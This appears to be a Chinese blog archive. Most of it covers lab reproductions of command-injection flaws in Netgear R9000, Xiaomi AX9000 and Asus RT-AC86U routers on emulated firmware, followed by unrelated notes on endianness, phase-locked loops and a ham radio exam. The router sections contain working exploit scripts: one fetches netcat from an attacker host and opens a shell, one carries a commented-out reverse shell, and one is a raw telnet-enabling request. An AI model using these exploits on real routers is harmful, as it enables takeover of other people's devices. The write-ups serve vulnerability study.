binwalk 3.1.1安装

binwalk安装

新版的binwalk使用Rust语言重写,提高了运行效率和速度。

从源码编译
第 1 步
安装 Rust 编译器:

sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
. $HOME/.cargo/env

步骤 2
下载 binwalk:

sudo apt install git
git clone https://github.com/ReFirmLabs/binwalk

步骤 3
安装依赖项(重要):

sudo ./binwalk/dependencies/ubuntu.sh

步骤 4
编译 Binwalk:

cd binwalk
cargo build --release

编译后的二进制文件将位于 :
binwalk/target/release/binwalk
您可以将其复制到您喜欢的任何目录,并从中运行它。

Netgear R9000 RCE漏洞复现

Netgear R9000 RCE漏洞复现

0x00 简介

品牌型号:Netgear R9000
固件版本:R9000-V1.0.4.26
固件下载地址:https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.26.zip
漏洞编号:CVE-2019-20760
漏洞描述:NETGEAR R9000 devices before 1.0.4.26 are affected by authentication bypass.
1.0.4.26之前的NETGEAR R9000设备受身份验证绕过的影响。

0x01 FrmAE固件模拟

使用FirmAE直接运行模拟
sudo ./run.sh -d netgear ~/Desktop/Firm/R9000-V1.0.4.26.img

FirmAE返回两个true,说明固件和web服务器都模拟成功,但是打开浏览器输入192.168.1.1,却无法访问到主页,不过访问别的页面会提示未授权,说明核心的web服务是开启的状态。

浏览器输入http://192.168.1.1/cgi-bin/
会弹出登录框提示输入用户名和密码

这里随便输入admin,密码123456,点击Sign in然后抓取发送的包

可以看到我们输入的用户名和密码被加密了,加密算法是base64。在密码这里,我们输入任意命令,都会被系统执行。
我们改掉冒号后面的内容为我们想执行的命令,比如 echo 1 >/tmp/1.txt


点击发送,然后在FirmAE shell里面查看,发现指令成功执行

打开IDA,可以看到漏洞点位于这里,程序拿到GET包之后,对包里面的内容做了识别,识别Basic后面的字符,然后调用b64decode()函数对Basic后面的参数进行decode,然后用strchr找到里面的”:”字符,对”:”后面的字符进行哈希加密,然后存入/tmp/hash_result文件,这条命令调用了system函数执行,将密码字段换成带或者,就可以执行任意命令了。

0x02 漏洞利用

看了一下固件里面的二进制文件,发现里面有wget,curl等工具,我们就可以试试用wget或者curl传进去一个木马或者netcat来达到控制路由器的目的。由于目标系统是arm32架构,我们需要自己编译一个nc,而且得是静态的。
先去netcat官网下载源码:
https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
解压:tar -xvf netcat-0.7.1.tar.gz
安装交叉编译器:sudo apt-get install gcc-arm-linux-gnueabihf
更改编译器为arm-linux-gnueabihf-gcc:./configure --host=arm-linux-gnueabihf
设置静态编译:打开configure文件,在里面任意位置加入这句话:
export LDFLAGS="-static"
开始编译:make
然后在src目录下就能拿到我们编译的二进制文件netcat

在这个目录下开启http服务,以便路由器下载netcat:python3 -m http.server
然后运行我们的脚本。

import requests
from pwn import *
import base64

cmd = 'admin:'
cmd += '`'
cmd +='curl -O 192.168.1.2:8000/netcat\n'
cmd +='chmod 777 ./netcat\n'
cmd += './netcat -l -p 4444 -e /bin/sh'
cmd +='`'
cmd_b64 = base64.b64encode(cmd.encode()).decode()

burp0_url = "http://192.168.1.1:80/cgi-bin/"
burp0_headers = {"Cache-Control": "max-age=0", 
"Authorization": "Basic " + cmd_b64, 
"Upgrade-Insecure-Requests": "1", 
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36", 
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", 
"Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
requests.get(burp0_url, headers=burp0_headers)

这里用curl而不是用wget的原因,是经测试,FirmAE模拟下的R9000固件运行wget会报错,所以只能用curl -O下载文件。

然后chmod 777 ./netcat给权限,然后使用./netcat -l -p 4444 -e /bin/sh开启反弹shell
执行脚本:

攻击端执行:nc 192.168.1.1 4444

成功拿到shell。

小米AX9000 CVE-2023-26315 / CNVD-2024-23093 漏洞复现

小米AX9000 CVE-2023-26315 / CNVD-2024-23093 漏洞复现

漏洞概述:小米路由器AX9000存在认证后命令注入漏洞。此漏洞是由于缺乏输入筛选导致的,攻击者可以利用此漏洞获得对设备的root访问权限。
漏洞编号:CVE-2023-26315 / CNVD-2024-23093
漏洞涉及固件:miwifi_ra70_firmware_cc424_1.0.168.bin
下载链接:https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra70/miwifi_ra70_firmware_cc424_1.0.168.bin

固件模拟

模拟固件开始:
根据WINMT的文章所述,先用binwalk3解压固件

binwalk3 -Me miwifi_ra70_firmware_cc424_1.0.168.bin

然后进入squashfs-root文件夹
由于固件用到了proc和dev里面的一些接口,这里就直接用mount –bind命令将本机的dev和proc文件挂载到squashfs-root文件夹内的dev和proc

sudo mount --bind /proc proc
sudo mount --bind /dev dev

然后用chroot . sh更改更目录为squashfs-root,并启动固件的bash

chroot . /bin/sh

直接启动sysapihttpd,会报noexistdictory错误,可知缺少/var/lock/procd_sysapihttpd.lock这个文件。然后还需要启动ubusd,ubusd会报丢失/var/run/ubus.sock,创建这两个目录和文件即可

mkdir /var/run
mkdir /var/lock
touch /var/run/ubus.sock
touch /var/lock/procd_sysapihttpd.lock

然后启动procd守护进程,ubusd服务,再执行启动sysapihttpd的脚本,即可启动web服务

/sbin/procd &
ubusd &
/etc/init.d/sysapihttpd start


我们在mac book pro M3系列arm64虚拟机上模拟一切正常并且可以打开web网页,但是在x64架构上的虚拟机中模拟失败了,后面的一系列操作都是在macbook上完成的。
直接访问IP地址,即可见到web页面

由于固件是模拟起来的,所以在初始化设置的时候会有一些问题,所以需要执行以下命令跳过初始化

uci set xiaoqiang.common.INITTED=1
uci commit

再次访问即可进入路由器管理登录页面

由于我们跳过了初始化,所以也没有设置路由器管理密码,这里就只能通过命令行输入

uci set account.common.admin=b3a4190199d9ee7fe73ef9a4942a69fece39a771
uci commit

即可更改密码为admin,这里的b3a4190199d9ee7fe73ef9a4942a69fece39a771来自sha1加密,sha1原文是admin加上一段固定的字符串a2ffa5c9be07488bbb04a3a47d3c5f6a
sha1(admina2ffa5c9be07488bbb04a3a47d3c5f6a)=b3a4190199d9ee7fe73ef9a4942a69fece39a771

漏洞复现

在运行脚本前,还需要启动两个服务,并且登录,拿到token

/usr/sbin/datacenter &
/usr/sbin/plugincenter &


攻击载荷:

import requests

server_ip = "192.168.1.193"  
token = "4d58c174fe0f30c0797efc7f228142b6"
nc_shell =";echo 1 > /tmp/1.txt;"
#nc_shell = ";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} 8889 >/tmp/f;".format(client_ip)

res = requests.post("http://{}/cgi-bin/luci/;stok={}/api/xqdatacenter/request".format(server_ip, token), data={'payload':'{"api":629, "appid":"' + nc_shell + '"}'})

print(res.text)


可以看到文件已创建,命令执行成功!

漏洞分析

定位到前端代码lua脚本:
/squashfs-root/usr/lib/lua/luci/controller/api
这个目录下存放了该漏洞的exp请求的lua脚本文件xqdatacenter.lua
尝试用gedit打开,发现是加密过了,用unluac_miwifi这个工具可以进行解密还原

git clone https://github.com/NyaMisty/unluac_miwifi.git
cd unluac_miwifi
mkdir build
javac -d build -sourcepath src  src/unluac/*.java
jar -cfm build/unluac.jar src/META-INF/MANIFEST.MF -C build  .

得到jar文件后,将unluac.jar拷贝到该目录,然后执行

java -jar ./unluac.jar ./xqdatacenter.lua > decode_xqdatacenter.lua

就能得到解密后的lua脚本了。
通过定位request关键字,我们能找到index -> tunnelRequest这里

function L0()
  local L0, L1, L2, L3, L4, L5, L6
  L0 = node
  L1 = "api"
  L2 = "xqdatacenter"
  L0 = L0(L1, L2)
  L1 = firstchild
  L1 = L1()
  L0.target = L1
  L0.title = ""
  L0.order = 300
  L0.sysauth = "admin"
  L0.sysauth_authenticator = "jsonauth"
  L0.index = true
  L1 = entry
  L2 = {}
  L3 = "api"
  L4 = "xqdatacenter"
  L2[1] = L3
  L2[2] = L4
  L3 = firstchild
  L3 = L3()
  L4 = _
  L5 = ""
  L4 = L4(L5)
  L5 = 300
  L1(L2, L3, L4, L5)
  L1 = entry
  L2 = {}
  L3 = "api"
  L4 = "xqdatacenter"
  L5 = "request"
  L2[1] = L3
  L2[2] = L4
  L2[3] = L5
  L3 = call
  L4 = "tunnelRequest"
  L3 = L3(L4)
  L4 = _
  L5 = ""
  L4 = L4(L5)
  L5 = 301
  L1(L2, L3, L4, L5)
  L1 = entry
  ...skip...
    L3 = "api"
  L4 = "xqdatacenter"
  L5 = "fsys_resume"
  L2[1] = L3
  L2[2] = L4
  L2[3] = L5
  L3 = call
  L4 = "fsysResume"
  L3 = L3(L4)
  L4 = _
  L5 = ""
  L4 = L4(L5)
  L5 = 301
  L1(L2, L3, L4, L5)
end
index = L0
function L5()
  local L0, L1, L2, L3, L4, L5, L6, L7, L8
  L0 = require
  L1 = "xiaoqiang.util.XQCryptoUtil"
  L0 = L0(L1)
  L1 = L0.binaryBase64Enc
  L2 = _UPVALUE0_
  L2 = L2.formvalue_unsafe
  L3 = "payload"
  L2, L3, L4, L5, L6, L7, L8 = L2(L3)
  L1 = L1(L2, L3, L4, L5, L6, L7, L8)
  L2 = _UPVALUE1_
  L2 = L2.THRIFT_TUNNEL_TO_DATACENTER
  L2 = L2 % L1
  L3 = require
  L4 = "luci.util"
  L3 = L3(L4)
  L4 = _UPVALUE0_
  L4 = L4.write
  L5 = L3.exec
  L6 = L2
  L5 = L5(L6)
  L6 = nil
  L7 = false
  L8 = true
  L4(L5, L6, L7, L8)
end
tunnelRequest = L5

可以看到脚本中tunnelRequest函数用先用binaryBash64Enc加密了所有request内容,然后再用L2.formvalue_unsafe函数调用payload字段的内容,然后调用THRIFT_TUNNEL_TO_DATACENTER发送出去
在/squashfs-root/usr/lib/lua/xiaoqiang/common/XQConfigs.lua中能看到THRIFT_TUNNEL_TO_DATACENTER的定义:

L0 = "thrifttunnel 0 '%s'"
THRIFT_TUNNEL_TO_DATACENTER = L0
L0 = "thrifttunnel 1 '%s'"
THRIFT_TUNNEL_TO_SMARTHOME = L0
L0 = "thrifttunnel 2 '%s'"
THRIFT_TUNNEL_TO_SMARTHOME_CONTROLLER = L0
L0 = "thrifttunnel 3 ''"
THRIFT_TO_MQTT_IDENTIFY_DEVICE = L0
L0 = "thrifttunnel 4 ''"
THRIFT_TO_MQTT_GET_SN = L0
L0 = "thrifttunnel 5 ''"
THRIFT_TO_MQTT_GET_DEVICEID = L0
L0 = "thrifttunnel 6 '%s'"
THRIFT_TUNNEL_TO_MIIO = L0
L0 = "thrifttunnel 7 '%s'"
THRIFT_TUNNEL_TO_YEELINK = L0
L0 = "thrifttunnel 8 '%s'"
THRIFT_TUNNEL_TO_CACHECENTER = L0

这里执行了系统命令
thrifttunnel 0 '%s
这点在我们执行exp时也发现了。


继续跟进到/usr/sbin/thrifttunnel
调用链为

main(a1,a2) -> sub_AB08(a1,a2) -> sub_1B9B0(v13,v12) -> sub_1F1F8()  base64解密 ->  sub_1BAE0(v12) -> apache::thrift::transport::TSocket::TSocket(v2, v22, 9090LL); 建立socket发送到localhost:9090端口。


第一参数为0,第二参数为eyJhcGkiOjYyOSwgImFwcGlkIjoiO2VjaG8gMSA+IC90bXAvMTIzNC50eHQ7In0=

这里sub_1B6FC经查看,程序功能接近strcpy,将字符串拷贝进v13,然后调用sub_1B9B0(v13,v12)并在该函数调用sub_1F1F8()解密,然后将值传给v12

再回到sub_AB08(),进入case 0:分支sub_1BAE0(v12)

然后在sub_1BAE0函数,建立socket并且发送到localhost:9090进程间通信。

之后的调用链位于/usr/sbin/datacenter
进入main函数,可以看到程序监听了localhost:9090端口

然后程序将获取到的值经过一系列thrift库函数传递到constructAPIMappingTable中,然后在该函数中的

datacenter::PluginApiCollection::sConstructMappingTable(a1)

里面,定义了所有apiid的具体选项

然后到callPluginCenter函数,将数据发送到localhost:9091

然后用IDA打开/usr/sbin/plugincenter发现这里和datacenter的逻辑一样,监听了9091端口获取数据给v41
然后调用apache::thrift::server::TNonblockingServer::serve((apache::thrift::server::TNonblockingServer *)v41);传递给中间函数做下一步处理
datacenter::PluginApiMappingExtendCollection::sConstructMappingTable里面定义了所有API ID对应调用的函数

发现程序调用了parseGetIdForVendor经过一系列处理后,将获取到的json内容传入PluginApi::getIdForVendor

然后在这个函数里面调用了CommonUtils::sCallSystem(v15, v13);
这里虽然有一个判断,检测app id是否合法,但是识别到invalid app id之后,程序并没有退出,而是继续往下执行,结果就造成了命令执行

结语

这是我第一次模拟出来小米路由器的固件,winmt大大给出的模拟方法和他的思路令人叹为观止,特此学习并记录下来。

Asus RT-AC86u Command injection

Description

Use the authorization page to enable the telnet service and execute arbitrary commands with the ROOT privilege

First login,then go to url :

http://routeip/Main_AdmStatus_Content.asp

To open telnetd services,input:”run_telnetd” then click refresh to send http requests,then in attacker pc ,run “telnet routeip” to connect router telnet service,then you have access to the route

Brand

Asus

Firmware version

RT-AC86U_3.0.0.4_384_10007-g8e859e9_cferom_ubi.w

POC:

POST /apply.cgi HTTP/1.1
Host: router.asus.com
Content-Length: 219
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://router.asus.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://router.asus.com/Main_AdmStatus_Content.asp
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: clickedItem_tab=0; asus_token=TvNnbwfKt2L7qHFOxlSw7geYJGZudcZ
Connection: close
current_page=Main_AdmStatus_Content.asp&next_page=Main_AdmStatus_Content.asp&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=CN&SystemCmd=run_telnetd&action=%E5%88%B7%E6%96%B0

Vulnerability analysis

In binary file /usr/sbin/httpd,function :sub_46A04

大端和小端的区别

大端(Big Endian) 和 小端(Little Endian) 是指数据在计算机内存中存储的字节顺序,尤其是多字节数据(如整数或浮点数)的存储方式。

1. 大端(Big Endian):

在大端模式下,数据的 高位字节(MSB,Most Significant Byte)存储在内存的 低地址 处,而 低位字节(LSB,Least Significant Byte)存储在内存的 高地址 处。
换句话说,数据的字节按照自然的 “从左到右” 的顺序存储。
例子:
假设有一个 4 字节的 32 位整数 0x12345678:
在大端模式下,内存中的存储顺序是:

地址:  0x00  0x01  0x02  0x03
数据:  0x12  0x34  0x56  0x78

2. 小端(Little Endian):

在小端模式下,数据的 低位字节(LSB)存储在内存的 低地址 处,而 高位字节(MSB)存储在内存的 高地址 处。
换句话说,数据的字节顺序与人类阅读的顺序相反。
例子:
假设有一个 4 字节的 32 位整数 0x12345678:
在小端模式下,内存中的存储顺序是:

地址:  0x00  0x01  0x02  0x03
数据:  0x78  0x56  0x34  0x12

举例说明:
假设我们有一个 16 位的整数 0x1234,在不同的字节顺序下,它的内存存储方式将是不同的。

大端模式:

地址:  0x00  0x01
数据:  0x12  0x34

小端模式:

地址:  0x00  0x01
数据:  0x34  0x12

3. 为什么会有大端和小端?

历史原因:不同的处理器架构选择了不同的字节顺序。比如,早期的 IBM 大型机使用大端,而 Intel 的 x86 架构使用小端。由于这些架构之间的差异,不同的系统和硬件平台会以不同的字节顺序存储数据。
跨平台兼容性:这导致了跨平台的数据交换(如文件传输、网络通信等)中需要注意字节序问题。现代计算机系统通常会提供某种方式来转换字节顺序(例如,网络协议一般使用大端字节序)。

4. 字节序与网络协议:

网络通信协议(如 TCP/IP)通常采用 大端字节序,这种字节序也叫做 网络字节序。这是因为大端字节序在网络协议中被认为是标准。

5. 总结:

大端(Big Endian):高位字节在低地址,低位字节在高地址。
小端(Little Endian):低位字节在低地址,高位字节在高地址。
不同的计算机体系结构可能采用不同的字节序。了解字节序是非常重要的,特别是在跨平台开发、文件格式设计、网络编程等场合。

什么是锁相环?

1、锁相环的基本组成

锁相环路是一种负反馈控制电路(Phase-Locked Loop 相位锁定环路),简称PLL。特点是:利用外部输入的参考信号控制环路内部震荡信号的频率和相位。

因锁相环可以实现输出信号频率对输入信号频率的自动跟踪,所以锁相环通常用于闭环跟踪电路。

在锁相环路工作时,当输出信号的频率与输入信号的频率相等时,输出电压与输入电压保持固定的相位差,即输出电压与输入电压的相位被固定住(锁住),这就是锁相环名称的由来。

锁相环通常由鉴相器(PD)环路滤波器(LF)压控振荡器(VCO)三部分组成

锁相环(PLL)组成原理框图

在这个图里,锁相环中的鉴相器又称为相位比较器。

它的作用是检测输入信号和输出信号的相位差,并将检测出的相位差信号转换成 uD(t) 电压信号输出。

该信号经低通滤波器滤波后形成压控振荡器的控制电压 uC(t) ,对振荡器输出信号的频率实施控制。

2、锁相环的工作原理

锁相环的工作原理分为以下几个步骤:

(1)当输入信号与反馈信号的相位不同步时,相位比较器(PD)检测到相位差,并生成一个与相位差成正比的电压信号。

(2)滤波器(LF)对电压信号进行滤波,去除噪声和抖动。

(3)电压控制振荡器(VCO)根据滤波后的电压信号调整输出信号的频率和相位,使输出信号逐渐接近输入信号的相位。

(4)当输出信号与输入信号的相位达到同步时,锁相环进入锁定状态,系统维持稳定度相位同步。

3、STM32中锁相环的应用

在STM32中,锁相环主要有以下作用:

  • 1、系统时钟生成:STM32通常用锁相环从外部晶震或者内部时钟源生成所需的系统时钟。例如:通过使用PLL,可以将外部8MHz晶振提升到72MHz或者更高,以满足高性能应用的需求。
  • 2、USB时钟生成:在具有USB功能的STM32微控制器中,锁相环可以用于生成精确的48MHz时钟,满足USB 2.0全速(12Mbps)或高速(480Mbps)通信的需求。
  • 3、音频时钟生成:在音频处理器应用中,STM32的PLL可以用于生成特定的硬盘采样率(44.1kHz,48kHz等)以及I2S和SPDIF接口所需的位时钟和帧时钟。
  • 4、ADC和DAC时钟生成:在高速数据采集和信号处理应用中,PLL可以用于为ADC和DAC提供精确的采样时钟,从而实现高性能的数据转换。
STM32F4 时钟树图

4、总结

锁相环在通信和电子领域有广泛的应用,它为实现高精度时钟信号提供了重要支持,本文简单介绍了锁相环基本原理,工作方式和应用。

参考文献:

【STM32】知识补充 锁相环原理与应用解析_stm32数字锁相-CSDN博客

STM32F4开发指南-寄存器版本(正点原子)

什么是锁相环?读懂它的基本组成和工作原理-CSDN博客

业余无线电备考难题本 A级

转自 nanmu42 仅做记录

原文章:业余无线电入门指南:概述、考证、购机、设台、呼号、备考难题本一网打尽 – 知乎 (zhihu.com)

  • A类业余无线电台允许发射的发射频率为:30-3000MHz范围内的各业余业务和卫星业余业务频段
  • 申请设置业余无线电台应当具备的条件有:熟悉无线电管理规定、具备国家规定的操作技术能力、发射设备符合国家技术标准、法律和行政法规规定的其他条件
  • 按照《业余电台管理办法》规定,申请设置使用配备有多台业余无线电发射设备的业余无线电台,应该:视为一个业余电台,指配一个电台呼号,但所有设备均应经过核定并将参数载入电台执照
  • 个人申请设置业余无线电台应当提交的书面材料为:两种表格,身份证和操作证书的原件、复印件
  • 设置在省、自治区、直辖市范围内通信的业余无线电台,审批机构为:设台地的地方无线电管理机构
  • 业余无线电台执照有效期届满后需要继续使用的,应当在下列期限内向核发执照的无线电管理机构申请办理延续手续:有效期届满一个月前
  • 业余无线电台使用的发射设备必须符合下列条件:商品设备应当具备《无线电发射设备型号核准证》,自制、改装、拼装设备应通过国家相关技术标准的检测
  • 对业余无线电台专用无线电发射设备进行型号核准的依据为:国家《无线电频率划分规定》中有关无线电发射设备技术指标的规定
  • 频率容限是发射设备的重要指标,通常用下述单位来表示:百万分之几(或者赫兹)
  • 杂散域发射功率是发射设备的重要指标,通常用下述单位来表示:绝对功率dBm、低于载波发射功率的分贝值dBc、低于PEP发射功率的相对值dB
  • 辐射(radiation)是指任何源的能量流以无线电波的形式向外发出。正确的说法是:闪电产生的电磁波干扰是一种辐射
  • 业余无线电专用发射设备必须满足的主要技术指标要求包括:频率容限和杂散辐射不超过限值,发射频率不超出国家规定的业余频率
  • 业余无线电台在业余业务、卫星业余业务作为次要业务使用的频率或者与其他主要业务共同使用的频率上发射操作时,应当注意:遵守无线电管理机构对该频率的使用规定
  • 在无线电管理中,由国家将某个特定的频带列入频率划分表,规定该频带可在指定的条件下供业余业余业务或者卫星业余业务使用,这个过程称为:划分
  • 在无线电管理中,将无线电频率或频道规定由一个或多个部门,在指定的区域内供地面或空间无线电通信业务在指定条件下使用,这个过程称为:分配
  • 在无线电管理中,将无线电频率或频道批准给具体的业余无线电台在规定条件下使用,这个过程称为:指配
  • VHF段的频率范围是多少?30到300MHz
  • UHF段的频率范围是多少?300到3000MHz
  • HF段的频率范围是多少?3到30MHz
  • 我国分配给业余业务和卫星业余业务专用的频段有:7MHz、14MHz、21MHz、28MHz、47GHz频段
  • 我国分配给业余业务和卫星业余业务与其他业务共用、并且业余业务和卫星业余业务作为主要业务的VHF和UHF频段有:50MHz、144MHz
  • 我国分配给业余业务和卫星业余业务与其他业务共用、并且业余业务和卫星业余业务作为唯一主要业务的频段的个数以及在3GHz以下的该类频段分别为:3个,144-146MHz
  • 我国分配给业余业务和卫星业余业务与其他业务共用、并且业余业务和卫星业余业务作为次要业务的1200MHz以下频段有:135.7kHz、10.1MHz、430MHz
  • 俗称的6米业余波段的频率范围以及业余业务和卫星业余业务的使用状态分别为:50-54MHz,主要业务
  • 俗称的2米业余波段的频率范围以及我国业余业务和卫星业余业务的使用状态分别为:144-148MHz;其中144-146MHz为唯一主要业务,146-148MHz为与其他业务共同作为主要业务
  • 俗称的0.7米业余波段的频率范围以及业余业务和卫星业余业务的使用状态分别为:430-440MHz,次要业务
  • 在我国和多数其他国家的频率分配中,业余业务在430-440MHz频段中作为次要业务与其他业务共用。这个频段中我国分配的主要业务是:无线电定位和航空无线电导航
  • VHF业余无线电台在144MHz频段进行本地联络时应避免占用的频率为:144-144.035MHz和145.8-146MHz
  • UHF业余无线电台在430MHz频段进行本地联络时应避免占用的频率为:431.9-432.240MHz和435-438MHz
  • 430MHz业余频段中留给业余卫星通信使用,话音及其他通信方式不应占用的频率段为:435MHz至438MHz
  • 144MHz业余频段中留给业余卫星通信使用,话音及其他通信方式不应占用的频率段为:145.8MHz至146MHz
  • 业余电台通信受到违法电台或者不明电台的有害干扰。正确的做法是:不予理睬,收集有关信息并向无线电管理机构举报
  • 填写和邮寄QSL卡片时的正确做法有:迫切需要方卡回寄卡片时,应直接向对方地址邮寄卡片并附加SASE
  • 对擅自设置、使用业余无线电台的单位或个人,国家无线电管理机构或者地方无线电管理机构可以根据其具体情况给予下列处罚:警告、查封或者没收设备、没收非法所得;情节严重的,可以并处一千元以上,五千元以下的罚款
  • 超出核定范围使用频率或者有其他违反频率管理有关规定的行为的,无线电管理机构可以根据其具体情况给予设置业余无线电台的单位或个人下列处罚:责令限期改正,可以处警告或者三万元以下的罚款
  • 询问“有人使用频率吗”?确认没有应答方能发起呼叫。下列英语短句中不能正确表达这一询问的是:Calling you, Roger?
  • 业余电台之间进行通信,必须相互正确发送和接收的信息为:本台呼号、对方呼号、信号报告
  • “谁在呼叫我”的业余无线电通信Q简语为:QRZ?
  • 我的电台位置是××××”的业余无线电通信Q简语为:QTH
  • ……,国家无线电管理机构或者地方无线电管理机构可以根据其具体情况给予设置业余无线电台的单位或个人下列处罚:警告、查封或者没收设备、没收非法所得;情节严重的,可以并处一千元以上,五千元以下的罚款;(出现三万元时)选三万元。
  • 业余电台违反无线电管制命令和无线电管制指令的,可以依法规受到下列处罚: 责令改正;拒不改正的,关闭、查封、暂扣或者拆除相关设备;情节严重的,吊销电台执照;违反治安管理规定的,由公安机关处罚
  • 业余无线电常用缩语“ARDF”的意思是:业余无线电测向
  • 业余无线电通信常用缩语“OM”的意思是:老朋友
  • “电台设备”的业余无线电通信常用缩语是:RIG
  • 收信机”的业余无线电通信常用缩语是:RCVR,RX
  • 发信机”的业余无线电通信常用缩语是:TX、XMTR
  • 收发信机”的业余无线电通信常用缩语是:XCVR
  • 业余无线电通信常用缩语“WX”的意思是:天气
  • 业余无线电通信常用缩语“73”的意思是:向对方的致意、美好的祝愿
  • 业余无线电通信中常用的天线种类的缩写DP代表:偶极天线
  • 业余无线电通信中常用的天线种类的缩写GP代表:垂直接地天线
  • 业余无线电通信中常用的天线种类的缩写BEAM代表:定向天线
  • 业余无线电通信中常用的天线种类的缩写YAGI代表:八木天线
  • 业余无线电通信中常用的天线种类的缩写VER代表:垂直天线
  • 我国所属的“CQ分区”有:23,24,27
  • ITU分区”是IARU的活动计算通信成绩的基础。我国所属的“ITU分区”有:33、42、43、44、50(最长的)
  • 业余无线电通信常用的梅登海德网格定位系统网格名称的格式为:2个字母和2位数字、2个字母和2位数字再加2个字母
  • 5W可以表示为:37dBm
  • 0.25W可以表示为:54dBμ
  • 0.4kW可以表示为:86dBμ
  • 电阻元件的“额定功率”参数是指:该元件正常工作时所能承受的最大功率
  • 用通常的调频方式进行话音通信,必要带宽约为:6.25kHz
  • 可以组成完整无线电接收系统的功能部件组合是:接收天线、解调器、输出部件
  • 可以组成完整无线电发信系统的功能部件组合是:射频振荡器、调制器、发射天线
  • 在整个频谱内具有连续的均匀频率分量的信号是:单个无限窄脉冲
  • 包含多个频率分量的信号通过滤波器会发生下列现象:频率失真
  • 下列几种图表中,最容易用来表达和解释模拟FM调制原理的是:频谱图
  • 对于给定的FM发射设备,决定其射频输出信号实际占用带宽的因素是:所传输信号的最高频率越高、幅度越大,射频输出占用带宽越宽
  • 无线电发射机的效率是指:输出到天线系统的信号功率与发射机所消耗的电源功率之比
  • 静噪灵敏度是指:能够使静噪电路退出静噪状态的射频信号最小输入电平
  • 衰减是指信号通过信道或电路后功率减少,衰落是指信号通过信道或电路后发生幅度随时间而起伏
  • 无线电发信机在无调制情况下,在一个射频周期内供给天线馈线的平均功率称为:载波功率
  • 调频发射机在发射的语音信号上附加一个人耳听不到的低频音频,用来打开接收机的静噪。这一技术的常用名词是:CTCSS
  • 下列哪一项决定了FM信号的频偏?取决于被调制信号的幅度
  • 下列哪一项术语表述了接收机区分不同信号的能力?选择性
  • 以下哪种语音调制常被用于长距离弱信号的VHF或UHF联络?SSB
  • 在给业余收发信机供电的整流电源中,开关电源可以做得比变压器直接降压整流的线性电源轻巧是因为:开关电源中变压器的工作频率高得多,可以缩小磁性材料截面和减少线圈匝数
  • 由半波长偶极天线和馈电电缆构成的天馈系统,理想的工作状态是:天线上只有驻波,馈线上只有行波
  • 在零仰角附近具有主辐射瓣的垂直接地天线,其振子的长度应为:1/4波长的奇数倍
  • 在为业余电台选购射频电缆作为天线馈线时,最重要的两项电气参数是:特性阻抗和工作频率下单位长度的传输功率损耗
  • 通常把垂直偶极天线或者垂直接地天线称为“全向天线”,是因为:它们在水平方向没有指向性,但在立体空间有方向性
  • 振子电气长度为1/4波长的垂直接地天线的最大辐射方向为:在水平方向没有指向性,在垂直方向指向水平面
  • 垂直接地天线(GP)的构造为电气长度为1/4波长的垂直振子加一个“接地”反射体,因其简单而被大量应用于手持和车载业余电台,但这种天线的实际工作情况往往与理论值相差较大,尤其在频率较低的频段。最常见的原因和改善办法是:缺乏有效的接地反射体。GP天线必须有足够大的接地反射体来形成振子镜像,否则谐振频率和阻抗都将与理论值有显著偏差,应尽量用大面积金属体与天线的接地端直接连接(选最长的)
  • 增益指标以dBi为单位。其意义为:“相对于无方向性点源天线的增益”(理想点源天线)
  • 增益指标以dBd为单位。其意义为:“相对于半波长偶极子天线的增益”
  • 增益指标以dB为单位。其意义为:没有说清楚计算增益所采用的比较基准,缺乏实际意义
  • 两款VHF垂直全向天线,用作发射。甲天线增益4.5dBd,乙天线增益为5.85dBi。它们在远处某接收天线中形成的信号功率差为:甲信号比乙信号强0.8dB
  • 两款VHF垂直全向天线,用作发射。甲天线增益2.9dBd,乙天线增益为5.85dBi。它们在远处某接收天线中形成的信号功率差为:乙信号比甲信号强0.8dB
  • 在业余无线电通信中,“驻波比”通常用来衡量:负载与传输线的匹配质量
  • 天线与馈线完美匹配时,在驻波表中显示的驻波比是?1:1
  • 和固体电介质同轴电缆相比,空气电介质同轴电缆的劣势是什么?空气电介质电缆要采取特别的手段来防止水分进入电缆
  • 下列关于直立天线的陈述,哪一项是正确的?该天线发射的电磁波电场垂直于地面
  • 就大多数手持电台随机附送的“橡皮天线”来说,它的劣势是什么?相对于全尺寸天线,它的发射和接收效率较低
  • 天线的增益是什么意思?相对于参考天线,在某一方向上信号强度的增加
  • 业余无线电普遍使用的同轴电缆的特性阻抗是?50欧姆
  • 为什么同轴电缆在业余无线电界的使用相对于其他馈线来说更多?因为它使用方便,与周围环境之间的相互影响小
  • 通过同轴电缆的信号频率越高,通常产生什么影响?损耗越高
  • 对于400MHz以上的信号,通常会使用的同轴电缆连接器是:N型连接器
  • 下列馈线中,哪一种在VHF和UHF频段的损耗最小?空气介质同轴硬电缆
  • 常用业余频段的电波在同轴电缆中的传播速度大约是:真空波速的0.65倍
  • 无线电波在自由空间中的传播路径损耗遵循下列规律:与距离的平方成正比,与频率的平方成正比(两个平方)
  • 地波是沿地面传播的无线电波,其衰减因子取决于:电波频率、地面导电率和传播距离(地面导电率)
  • 决定超短波视距传播距离极限的主要因素是:发射天线和接收天线离地面的相对高度值
  • 多径传播对UHF波段或VHF波段数据通信的影响是:可能使误码率增大
  • 如果你收到了一个从上千公里以外的距离传播过来的VHF信号,最可能的原因是:信号被突发E电离层反射过来
